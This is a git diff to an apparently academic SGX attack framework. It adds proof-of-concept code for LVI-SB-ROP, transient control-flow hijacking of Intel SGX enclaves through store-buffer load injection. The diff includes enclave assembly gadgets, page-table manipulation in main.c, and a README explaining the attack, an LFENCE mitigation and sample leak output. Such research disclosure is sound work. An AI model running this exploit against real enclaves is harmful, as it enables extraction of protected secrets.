diff --git a/app/lvi/Enclave/Makefile b/app/lvi/Enclave/Makefile index 601e183..a2baaa1 100644 --- a/app/lvi/Enclave/Makefile +++ b/app/lvi/Enclave/Makefile @@ -7,7 +7,7 @@ INCLUDE = -I$(SGX_SDK)/include/ -I$(SGX_SDK)/include/tlibc T_CFLAGS = $(CFLAGS) -nostdinc -fvisibility=hidden -fpie -fstack-protector -g -Os U_CFLAGS = $(CFLAGS) -nostdinc -fvisibility=hidden -fpie -fstack-protector -g AR_FLAGS = rcs -OBJECTS = encl.o +OBJECTS = encl.o asm.o LIB_SGX_TRTS = -lsgx_trts LIB_SGX_TSERVICE = -lsgx_tservice diff --git a/app/lvi/Enclave/asm.S b/app/lvi/Enclave/asm.S new file mode 100644 index 0000000..b166643 --- /dev/null +++ b/app/lvi/Enclave/asm.S @@ -0,0 +1,68 @@ +#define OFFSET 20 +#define CHAR 'R' +#define LFENCE 0 + + .data +rsp_backup: + .quad 0x0 + + .text + .global ecall_init_stack +ecall_init_stack: + /* NOTE: we setup an explicit dummy stack to easily revoke access rights and keep the poc code minimal */ + push %rax + push %rbx + + lea page_b(%rip), %rbx + add $OFFSET, %rbx + movq $'B', (%rbx) + lea do_real_ret(%rip), %rax + mov %rax, 8(%rbx) + + pop %rbx + pop %rax + ret + + .text + .align 0x1000 /* make sure ret_gadget is on the same page and in the TLB */ + .global ecall_lvi_sb_rop + # %rdi store_pt + # %rsi oracle_pt +ecall_lvi_sb_rop: + mov %rsp, rsp_backup(%rip) + lea page_b(%rip), %rsp + add $OFFSET, %rsp + + /* transient delay */ + clflush dummy(%rip) + mov dummy(%rip), %rax + + /* STORE TO USER ADRS */ + movq $CHAR, (%rdi) + lea ret_gadget(%rip), %rax + movq %rax, 8(%rdi) + + /* HIJACK TRUSTED LOAD FROM ENCLAVE STACK */ + /* should go to do_real_ret; will transiently go to ret_gadget if we fault on the stack loads */ + pop %rax +#if LFENCE + notq (%rsp) + notq (%rsp) + lfence + ret +#else + ret +#endif + +1: jmp 1b + mfence + +do_real_ret: + mov rsp_backup(%rip), %rsp + ret + +ret_gadget: + shl $0xc, %rax + movq (%rsi, %rax), %rdx +1: jmp 1b + mfence diff --git a/app/lvi/Enclave/encl.c b/app/lvi/Enclave/encl.c index 1508d2c..008daa7 100644 --- 
a/app/lvi/Enclave/encl.c +++ b/app/lvi/Enclave/encl.c @@ -19,20 +19,7 @@ #include #define OFFSET 20 -#define FILL_STORE_BUFFER 1 - -#if FILL_STORE_BUFFER - char __attribute__((aligned(0x1000))) dummy_buf[4096 * 64]; - inline void __attribute__((always_inline)) fill_store_buffer(int offset) - { - for(int i = 0; i < 64; i++) - { - dummy_buf[((offset + 67) % 4096) + i * 4096] = 0x1; - } - } -#else - #define fill_store_buffer(offset) -#endif +#define LFENCE 0 inline void __attribute__((always_inline)) maccess(void *p) { @@ -78,7 +65,6 @@ void ecall_lvi_store_user(uint64_t *user_pt, char *oracle) /* 0. Fence to protect against Spectre v1 */ __builtin_ia32_lfence(); transient_delay(); - fill_store_buffer(OFFSET); /* 1. STORE to attacker-controlled _untrusted_ address */ *user_pt = (uint64_t) 'S'; @@ -86,6 +72,10 @@ void ecall_lvi_store_user(uint64_t *user_pt, char *oracle) /* 2. VICTIM LOAD: inject 'S' and override trusted value 'B' */ volatile char valb = *pt_b; +#if LFENCE + asm("lfence"); +#endif + /* 3. 
VICTIM ENCODE: e.g., cache-based covert channel gadget */ volatile char leak = oracle[4096*valb]; } @@ -101,6 +91,11 @@ void ecall_lvi_remap_l1d(char *oracle) /* VICTIM LOAD: inject 'A' from remapped physical address for trusted load to 'B'*/ volatile char valb = *pt_b; + +#if LFENCE + asm("lfence"); +#endif + /* VICTIM ENCODE: e.g., cache-based covert channel gadget */ volatile char leak = oracle[4096*valb]; } diff --git a/app/lvi/Enclave/encl.edl b/app/lvi/Enclave/encl.edl index 5476aff..f10f766 100644 --- a/app/lvi/Enclave/encl.edl +++ b/app/lvi/Enclave/encl.edl @@ -6,6 +6,9 @@ enclave { public void ecall_lvi_store_user([user_check] uint64_t *user_pt, [user_check] char *oracle); public void ecall_lvi_remap_l1d([user_check] char *oracle); + + public void ecall_init_stack(void); + public int ecall_lvi_sb_rop([user_check] uint64_t *user_pt, [user_check] char *oracle); }; untrusted { diff --git a/app/lvi/README.md b/app/lvi/README.md index 7a2d135..56ca70b 100644 --- a/app/lvi/README.md +++ b/app/lvi/README.md @@ -181,3 +181,81 @@ Flush+Reload Threshold: 226 +-------------------------------------------------------------------------------------------+ A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A ``` + +## LVI-SB-ROP: Transient control flow hijacking + +Consider the minimal example code gadget below: + +-------------------------------------------------------------------------------- +```C +1 void ecall_lvi_store_user(uint64_t *user_pt, uint64_t user_val, char *oracle) +2 { +3 *user_pt = user_val; /* VICTIM STORE: write user-controlled value to extra-enclave user memory */ +4 return; /* VICTIM LOAD: inject from user store 4K alias (i.e., control flow hijack) */ +6 } +``` +-------------------------------------------------------------------------------- + +**Attack procedure.** We again rely on an attacker-controlled user pointer +dereference inside the enclave. 
Where the above LVI variant faulted on user +memory loads, we now provoke page faults on legitimate enclave memory load +instructions. Specifically, we require that the enclave first stores a +(user-controlled) value to a user-controlled untrusted address (line 3). +Subsequently, the enclave "return" statement performs a _legit_ load from the +enclave stack (line 4) and uses that value as a trusted return address to +redirect control flow. + +Architecturally the enclave will always follow the intended control/data flow, +but an SGX page table adversary may force the legit load on line (4) to fault +and read the untrusted attacker value from the store buffer instead of from +trusted enclave memory. The transient instructions following the faulting load +will now compute on the value from the store buffer and hence redirect +transient control flow to an arbitrary attacker-controlled location. Much like +Spectre v2 branch poisoning attacks, this ultimately allows attackers to abuse +"2nd-stage gadgets" in the existing enclave code base to dereference arbitrary +secrets and encode them in the microarchitectural CPU state. + +Note that for clarity we focused on hijacking RET control flow in the above +example, but we also demonstrated successful LVI attacks for JMP/CALL indirect +control flow instructions. This effectively shows that we can arbitrarily +hijack transient return control flow, even in the presence of strong +Spectre-RSB/BTB mitigations that flush shared RSB/BTB buffers on enclave entry. +Interestingly, we also found that large or multiple user stores enable +attackers to set up a fake "transient stack" in the store buffer so as to +repeatedly inject illegal values for consecutive enclave stack loads (POP/RET +sequences). Much like in architectural ROP, such a capability allows chaining +together multiple 2nd-stage gadgets to compose arbitrary transient computations +of interest. 
+ +**Suggested mitigation.** Insert LFENCE instructions after loading branch target addresses from trusted memory, and before redirecting control flow. Break up x86 `ret` instructions into explicit load and branch instructions. + +**Proof-of-concept code.** Enable this PoC through `#define LVI_SB_ROP 1` in `main.c`. Example output for `make run` as follows (on a processor vulnerable to [Fallout](https://mdsattacks.com/)/[MSBDS](https://software.intel.com/security-software-guidance/insights/deep-dive-intel-analysis-microarchitectural-data-sampling)): + +``` $ make run +Flush+Reload Threshold: 227 +[sched.c] continuing on CPU 1 +[main.c] Creating enclave... +==== Victim Enclave ==== +[pt.c] /dev/sgx-step opened! + Base: 0x7f8e67000000 + Size: 8388608 + Limit: 0x7f8e67800000 + TCS: 0x7f8e67481000 + SSA: 0x7f8e67482f48 + AEP: 0x7f8e695fa845 + EDBGRD: debug +[main.c] oracle at 0x563fd9561000 +[main.c] user_page at 0x563fd9661000 +[main.c] enclave_page_a at 0x7f8e6721e000 w PTE +[pt.c] /dev/mem opened! 
++-------------------------------------------------------------------------------------------+ +| XD | PK | IGN | RSVD | PHYS ADRS | IGN | G | PAT | D | A | PCD | PWT | U/S | R/W | P | +| 0 | x | x | 0 | 0x00007053e000 | x | x | x | 1 | 1 | x | x | 1 | 1 | 1 | ++-------------------------------------------------------------------------------------------+ +[main.c] enclave_page_b at 0x7f8e6721d000 w PTE ++-------------------------------------------------------------------------------------------+ +| XD | PK | IGN | RSVD | PHYS ADRS | IGN | G | PAT | D | A | PCD | PWT | U/S | R/W | P | +| 0 | x | x | 0 | 0x00007053f000 | x | x | x | 1 | 1 | x | x | 1 | 1 | 1 | ++-------------------------------------------------------------------------------------------+ +R R R R R R R R R R R R R R R R R R R R R R R R R R R R R R R R R R R R R R R R R R R R R R R R R +``` diff --git a/app/lvi/main.c b/app/lvi/main.c index b158b6d..a939af1 100644 --- a/app/lvi/main.c +++ b/app/lvi/main.c @@ -35,12 +35,11 @@ /* XXX select attack scenario below */ #define LVI_SB 0 -#define LVI_L1D 1 -#define LVI_SB_ROP 0 -#define LVI_L1D_ROP 0 +#define LVI_L1D 0 +#define LVI_SB_ROP 1 char __attribute__((aligned(0x1000))) oracle[256 * 4096]; -char __attribute__((aligned(0x1000))) user_page[4096*64]; +char __attribute__((aligned(0x1000))) user_page[4096]; void *enclave_page_a = NULL, *enclave_page_b = NULL; char *user_pt = user_page; uint64_t *pte_a = NULL, *pte_b = NULL; @@ -82,7 +81,7 @@ void fault_handler(int signal) int main( int argc, char **argv ) { sgx_launch_token_t token = {0}; - int updated = 0; + int updated = 0, rv; sgx_enclave_id_t eid = 0; /* Calculate Flush+Reload threshold */ @@ -115,6 +114,10 @@ int main( int argc, char **argv ) pte_b = remap_page_table_level( enclave_page_b, PTE); print_pte(pte_b); pte_b_valid = *pte_b; + +#if LVI_SB_ROP + SGX_ASSERT( ecall_init_stack(eid) ); +#endif /* Inject false load values */ mfence(); @@ -132,7 +135,8 @@ int main( int argc, char **argv ) *pte_b = 
*pte_a; SGX_ASSERT( ecall_lvi_remap_l1d(eid, oracle) ); #elif LVI_SB_ROP - #elif LVI_L1D_ROP + *pte_b = MARK_SUPERVISOR(*pte_b); + SGX_ASSERT( ecall_lvi_sb_rop(eid, &rv, (void*) user_pt+OFFSET, oracle) ); #endif } }